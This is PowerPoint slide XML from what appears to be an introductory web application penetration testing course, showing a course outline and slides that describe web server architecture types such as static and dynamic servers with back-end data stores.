            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3316838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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web Site Server</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Architecture Types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1615440"/>
            <a:ext cx="7924800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Generally, web sites follow one or more of four different architecture types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Dynamic Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Application Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Proxy Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As testers, we need to determine what type of web site server architecture we face</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Target system personnel may tell us in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>white-box</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>black-box</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> test, we need to discern this based on clues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Clues such as server responses and cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>ll discuss client architectures later in the course</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>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GB" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Conclusion of PEWAPT101.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178179" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1615440"/>
            <a:ext cx="7620000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In this course segment, we reviewed HTTP and the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We've analyzed a web application penetration testing methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Thank you!</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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web Servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1709738"/>
            <a:ext cx="6248400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Pure web servers are rare today</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>They serve static content only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Very useful for information discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Sites on this server can be used to build wordlists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Sites may also contain information about the technology used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Typically safe from most active web application attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Although misconfigurations of underlying web server, ancillary network services, and operating system could provide avenue for attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Most modern web servers fall under the dynamic category</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6931025" y="5118100"/>
            <a:ext cx="612775" cy="444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Web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27653" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858000" y="2057400"/>
            <a:ext cx="663575" cy="444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Web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27654" name="Straight Connector 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6629401" y="3884612"/>
            <a:ext cx="2286000" cy="3175"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27655"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7600" y="1981200"/>
            <a:ext cx="609600" cy="871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656"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7600" y="4953000"/>
            <a:ext cx="609600" cy="871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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Dynamic Server Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1645920"/>
            <a:ext cx="4876800" cy="4450080"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web Server that serves both static and active content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Most common server type found today</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Active content often drawn from a back-end data store</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Commonly a relational database accessed using SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Other data stores are possible, such as mainframe, file server, or other application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Very simple and inexpensive to set up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>More difficult to protect and harden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Code runs on same server as display</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28676" name="Can 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="7696200" y="2176463"/>
            <a:ext cx="1066800" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Data Store</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28677" name="Straight Connector 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="2405063"/>
            <a:ext cx="914400" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28678" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5635625" y="5084763"/>
            <a:ext cx="612775" cy="444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Web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28679" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="2024063"/>
            <a:ext cx="663575" cy="444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Web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28680" name="Straight Connector 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5334001" y="3851275"/>
            <a:ext cx="2286000" cy="3175"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
